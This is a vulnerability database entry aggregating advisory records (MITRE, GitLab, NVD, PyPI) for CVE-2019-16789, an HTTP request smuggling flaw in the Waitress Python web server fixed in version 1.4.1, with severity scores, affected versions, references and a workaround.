"product_name": "Waitress",
"version": {
"version_data": [
{
"version_affected": "\u003c",
"version_name": "\u003c 1.4.1",
"version_value": "1.4.1"
}
]
}
}
]
},
"vendor_name": "Pylons"
}
]
}
},
"data_format": "MITRE",
"data_type": "CVE",
"data_version": "4.0",
"description": {
"description_data": [
{
"lang": "eng",
"value": "In Waitress through version 1.4.0, if a proxy server is used in front of waitress, an invalid request may be sent by an attacker that bypasses the front-end and is parsed differently by waitress leading to a potential for HTTP request smuggling. Specially crafted requests containing special whitespace characters in the Transfer-Encoding header would get parsed by Waitress as being a chunked request, but a front-end server would use the Content-Length instead as the Transfer-Encoding header is considered invalid due to containing invalid characters. If a front-end server does HTTP pipelining to a backend Waitress server this could lead to HTTP request splitting which may lead to potential cache poisoning or unexpected information disclosure. This issue is fixed in Waitress 1.4.1 through more strict HTTP field validation."
}
]
},
"impact": {
"cvss": {
"attackComplexity": "HIGH",
"attackVector": "NETWORK",
"availabilityImpact": "NONE",
"baseScore": 7.1,
"baseSeverity": "HIGH",
"confidentialityImpact": "LOW",
"integrityImpact": "HIGH",
"privilegesRequired": "LOW",
"scope": "CHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:C/C:L/I:H/A:N",
"version": "3.1"
}
},
"problemtype": {
"problemtype_data": [
{
"description": [
{
"lang": "eng",
"value": "CWE-444 Inconsistent Interpretation of HTTP Requests (\u0027HTTP Request Smuggling\u0027)"
}
]
}
]
},
"references": {
"reference_data": [
{
"name": "FEDORA-2020-bdcc8ffc24",
"refsource": "FEDORA",
"url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/GVDHR2DNKCNQ7YQXISJ45NT4IQDX3LJ7/"
},
{
"name": "FEDORA-2020-65a7744e38",
"refsource": "FEDORA",
"url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/LYEOTGWJZVKPRXX2HBNVIYWCX73QYPM5/"
},
{
"name": "RHSA-2020:0720",
"refsource": "REDHAT",
"url": "https://access.redhat.com/errata/RHSA-2020:0720"
},
{
"name": "https://www.oracle.com/security-alerts/cpuapr2022.html",
"refsource": "MISC",
"url": "https://www.oracle.com/security-alerts/cpuapr2022.html"
},
{
"name": "https://docs.pylonsproject.org/projects/waitress/en/latest/#security-fixes",
"refsource": "MISC",
"url": "https://docs.pylonsproject.org/projects/waitress/en/latest/#security-fixes"
},
{
"name": "https://github.com/github/advisory-review/pull/14604",
"refsource": "CONFIRM",
"url": "https://github.com/github/advisory-review/pull/14604"
},
{
"name": "https://github.com/Pylons/waitress/commit/11d9e138125ad46e951027184b13242a3c1de017",
"refsource": "MISC",
"url": "https://github.com/Pylons/waitress/commit/11d9e138125ad46e951027184b13242a3c1de017"
},
{
"name": "[debian-lts-announce] 20220512 [SECURITY] [DLA 3000-1] waitress security update",
"refsource": "MLIST",
"url": "https://lists.debian.org/debian-lts-announce/2022/05/msg00011.html"
}
]
},
"source": {
"advisory": "GHSA-m5ff-3wj3-8ph4",
"discovery": "UNKNOWN"
},
"work_around": [
{
"lang": "eng",
"value": "You may enable additional protections on front-end servers, those that follow RFC7230 correctly would drop the request with a 400 Bad Request.\n\nWaitress will now correctly responds to the request with a 400 Bad Request, and will drop the connection to avoid any potential HTTP pipelining issues."
}
]
},
"gitlab.com": {
"advisories": [
{
"affected_range": "\u003c1.4.2",
"affected_versions": "All versions before 1.4.2",
"cvss_v2": "AV:N/AC:L/Au:N/C:P/I:P/A:N",
"cvss_v3": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:H/A:N",
"cwe_ids": [
"CWE-1035",
"CWE-444",
"CWE-937"
],
"date": "2021-01-08",
"description": "In Waitress through version 1.4.0, if a proxy server is used in front of waitress, an invalid request may be sent by an attacker that bypasses the front-end and is parsed differently by waitress leading to a potential for HTTP request smuggling. Specially crafted requests containing special whitespace characters in the Transfer-Encoding header would get parsed by Waitress as being a chunked request, but a front-end server would use the Content-Length instead as the Transfer-Encoding header is considered invalid due to containing invalid characters. If a front-end server does HTTP pipelining to a backend Waitress server this could lead to HTTP request splitting which may lead to potential cache poisoning or unexpected information disclosure. This issue is fixed in Waitress 1.4.1 through more strict HTTP field validation.",
"fixed_versions": [
"1.4.2"
],
"identifier": "CVE-2019-16789",
"identifiers": [
"GHSA-968f-66r5-5v74",
"CVE-2019-16789"
],
"not_impacted": "All versions starting from 1.4.2",
"package_slug": "pypi/waitress",
"pubdate": "2020-01-06",
"solution": "Upgrade to version 1.4.2 or above.",
"title": "Inconsistent Interpretation of HTTP Requests ",
"urls": [
"https://github.com/Pylons/waitress/security/advisories/GHSA-968f-66r5-5v74",
"https://nvd.nist.gov/vuln/detail/CVE-2019-16789",
"https://github.com/github/advisory-review/pull/14604",
"https://github.com/Pylons/waitress/commit/11d9e138125ad46e951027184b13242a3c1de017",
"https://docs.pylonsproject.org/projects/waitress/en/latest/#security-fixes",
"https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/GVDHR2DNKCNQ7YQXISJ45NT4IQDX3LJ7/",
"https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/LYEOTGWJZVKPRXX2HBNVIYWCX73QYPM5/",
"https://access.redhat.com/errata/RHSA-2020:0720",
"https://github.com/advisories/GHSA-968f-66r5-5v74"
],
"uuid": "f19e2471-4474-4572-b0f0-5486495527c9"
}
]
},
"nvd.nist.gov": {
"configurations": {
"CVE_data_version": "4.0",
"nodes": [
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:a:agendaless:waitress:*:*:*:*:*:*:*:*",
"cpe_name": [],
"versionEndIncluding": "1.4.0",
"vulnerable": true
}
],
"operator": "OR"
},
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:a:oracle:communications_cloud_native_core_network_function_cloud_native_environment:1.10.0:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
}
],
"operator": "OR"
},
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:o:debian:debian_linux:9.0:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
}
],
"operator": "OR"
},
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:o:fedoraproject:fedora:30:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:o:fedoraproject:fedora:31:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
}
],
"operator": "OR"
},
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:a:redhat:openstack:15:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
}
],
"operator": "OR"
}
]
},
"cve": {
"CVE_data_meta": {
"ASSIGNER": "security-advisories@github.com",
"ID": "CVE-2019-16789"
},
"data_format": "MITRE",
"data_type": "CVE",
"data_version": "4.0",
"description": {
"description_data": [
{
"lang": "en",
"value": "In Waitress through version 1.4.0, if a proxy server is used in front of waitress, an invalid request may be sent by an attacker that bypasses the front-end and is parsed differently by waitress leading to a potential for HTTP request smuggling. Specially crafted requests containing special whitespace characters in the Transfer-Encoding header would get parsed by Waitress as being a chunked request, but a front-end server would use the Content-Length instead as the Transfer-Encoding header is considered invalid due to containing invalid characters. If a front-end server does HTTP pipelining to a backend Waitress server this could lead to HTTP request splitting which may lead to potential cache poisoning or unexpected information disclosure. This issue is fixed in Waitress 1.4.1 through more strict HTTP field validation."
}
]
},
"problemtype": {
"problemtype_data": [
{
"description": [
{
"lang": "en",
"value": "CWE-444"
}
]
}
]
},
"references": {
"reference_data": [
{
"name": "https://github.com/Pylons/waitress/commit/11d9e138125ad46e951027184b13242a3c1de017",
"refsource": "MISC",
"tags": [
"Patch",
"Third Party Advisory"
],
"url": "https://github.com/Pylons/waitress/commit/11d9e138125ad46e951027184b13242a3c1de017"
},
{
"name": "https://github.com/github/advisory-review/pull/14604",
"refsource": "CONFIRM",
"tags": [
"Broken Link",
"Third Party Advisory"
],
"url": "https://github.com/github/advisory-review/pull/14604"
},
{
"name": "https://docs.pylonsproject.org/projects/waitress/en/latest/#security-fixes",
"refsource": "MISC",
"tags": [
"Release Notes",
"Vendor Advisory"
],
"url": "https://docs.pylonsproject.org/projects/waitress/en/latest/#security-fixes"
},
{
"name": "FEDORA-2020-bdcc8ffc24",
"refsource": "FEDORA",
"tags": [
"Mailing List",
"Third Party Advisory"
],
"url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/GVDHR2DNKCNQ7YQXISJ45NT4IQDX3LJ7/"
},
{
"name": "FEDORA-2020-65a7744e38",
"refsource": "FEDORA",
"tags": [
"Mailing List",
"Third Party Advisory"
],
"url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/LYEOTGWJZVKPRXX2HBNVIYWCX73QYPM5/"
},
{
"name": "RHSA-2020:0720",
"refsource": "REDHAT",
"tags": [
"Third Party Advisory"
],
"url": "https://access.redhat.com/errata/RHSA-2020:0720"
},
{
"name": "https://www.oracle.com/security-alerts/cpuapr2022.html",
"refsource": "MISC",
"tags": [
"Patch",
"Third Party Advisory"
],
"url": "https://www.oracle.com/security-alerts/cpuapr2022.html"
},
{
"name": "[debian-lts-announce] 20220512 [SECURITY] [DLA 3000-1] waitress security update",
"refsource": "MLIST",
"tags": [
"Mailing List",
"Third Party Advisory"
],
"url": "https://lists.debian.org/debian-lts-announce/2022/05/msg00011.html"
}
]
}
},
"impact": {
"baseMetricV2": {
"acInsufInfo": false,
"cvssV2": {
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "NONE",
"availabilityImpact": "NONE",
"baseScore": 6.4,
"confidentialityImpact": "PARTIAL",
"integrityImpact": "PARTIAL",
"vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:N",
"version": "2.0"
},
"exploitabilityScore": 10.0,
"impactScore": 4.9,
"obtainAllPrivilege": false,
"obtainOtherPrivilege": false,
"obtainUserPrivilege": false,
"severity": "MEDIUM",
"userInteractionRequired": false
},
"baseMetricV3": {
"cvssV3": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "NONE",
"baseScore": 8.2,
"baseSeverity": "HIGH",
"confidentialityImpact": "LOW",
"integrityImpact": "HIGH",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:H/A:N",
"version": "3.1"
},
"exploitabilityScore": 3.9,
"impactScore": 4.2
}
},
"lastModifiedDate": "2022-09-23T18:58Z",
"publishedDate": "2019-12-26T17:15Z"
}
}
}
pysec-2019-138
Vulnerability from pysec
Published
2019-12-26 17:15
Modified
2020-02-25 17:15
Details
In Waitress through version 1.4.0, if a proxy server is used in front of waitress, an invalid request may be sent by an attacker that bypasses the front-end and is parsed differently by waitress leading to a potential for HTTP request smuggling. Specially crafted requests containing special whitespace characters in the Transfer-Encoding header would get parsed by Waitress as being a chunked request, but a front-end server would use the Content-Length instead as the Transfer-Encoding header is considered invalid due to containing invalid characters. If a front-end server does HTTP pipelining to a backend Waitress server this could lead to HTTP request splitting which may lead to potential cache poisoning or unexpected information disclosure. This issue is fixed in Waitress 1.4.1 through more strict HTTP field validation.
Aliases
{
"affected": [
{
"package": {
"ecosystem": "PyPI",
"name": "waitress",
"purl": "pkg:pypi/waitress"
},
"ranges": [
{
"events": [
{
"introduced": "0"
},
{
"fixed": "11d9e138125ad46e951027184b13242a3c1de017"
}
],
"repo": "https://github.com/Pylons/waitress",
"type": "GIT"
},
{
"events": [
{
"introduced": "0"
},
{
"fixed": "1.4.1"
}
],
"type": "ECOSYSTEM"
}
],
"versions": [
"0.1",
"0.2",
"0.3",
"0.4",
"0.5",
"0.6",
"0.6.1",
"0.7",
"0.8",
"0.8.1",
"0.8.2",
"0.8.3",
"0.8.4",
"0.8.5",
"0.8.6",
"0.8.7",
"0.8.8",
"0.8.9",
"0.8.10",
"0.8.11b0",
"0.9.0b0",
"0.9.0b1",
"0.9.0",
"1.0a1",
"1.0a2",
"1.0.0",
"1.0.1",
"1.0.2",
"1.1.0",
"1.2.0b1",
"1.2.0b2",
"1.2.0b3",
"1.2.0",
"1.2.1",
"1.3.0b0",
"1.3.0",
"1.3.1",
"1.4.0"
]
}
],
"aliases": [
"CVE-2019-16789",
"GHSA-968f-66r5-5v74"
],
"details": "In Waitress through version 1.4.0, if a proxy server is used in front of waitress, an invalid request may be sent by an attacker that bypasses the front-end and is parsed differently by waitress leading to a potential for HTTP request smuggling. Specially crafted requests containing special whitespace characters in the Transfer-Encoding header would get parsed by Waitress as being a chunked request, but a front-end server would use the Content-Length instead as the Transfer-Encoding header is considered invalid due to containing invalid characters. If a front-end server does HTTP pipelining to a backend Waitress server this could lead to HTTP request splitting which may lead to potential cache poisoning or unexpected information disclosure. This issue is fixed in Waitress 1.4.1 through more strict HTTP field validation.",
"id": "PYSEC-2019-138",
"modified": "2020-02-25T17:15:00Z",
"published": "2019-12-26T17:15:00Z",
"references": [
{
"type": "FIX",
"url": "https://github.com/Pylons/waitress/commit/11d9e138125ad46e951027184b13242a3c1de017"
},
{
"type": "ADVISORY",
"url": "https://github.com/github/advisory-review/pull/14604"
},
{
"type": "WEB",
"url": "https://docs.pylonsproject.org/projects/waitress/en/latest/#security-fixes"
},
{
"type": "WEB",
"url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/GVDHR2DNKCNQ7YQXISJ45NT4IQDX3LJ7/"
},
{
"type": "WEB",
"url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/LYEOTGWJZVKPRXX2HBNVIYWCX73QYPM5/"
},
{
"type": "ADVISORY",
"url": "https://access.redhat.com/errata/RHSA-2020:0720"
},
{
"type": "ADVISORY",
"url": "https://github.com/advisories/GHSA-968f-66r5-5v74"
}
]
}
Loading…
Loading…
Sightings
| Author | Source | Type | Date |
|---|
Nomenclature
- Seen: The vulnerability was mentioned, discussed, or seen somewhere by the user.
- Confirmed: The vulnerability is confirmed from an analyst perspective.
- Exploited: This vulnerability was exploited and seen by the user reporting the sighting.
- Patched: This vulnerability was successfully patched by the user reporting the sighting.
- Not exploited: This vulnerability was not exploited or seen by the user reporting the sighting.
- Not confirmed: The user expresses doubt about the veracity of the vulnerability.
- Not patched: This vulnerability was not successfully patched by the user reporting the sighting.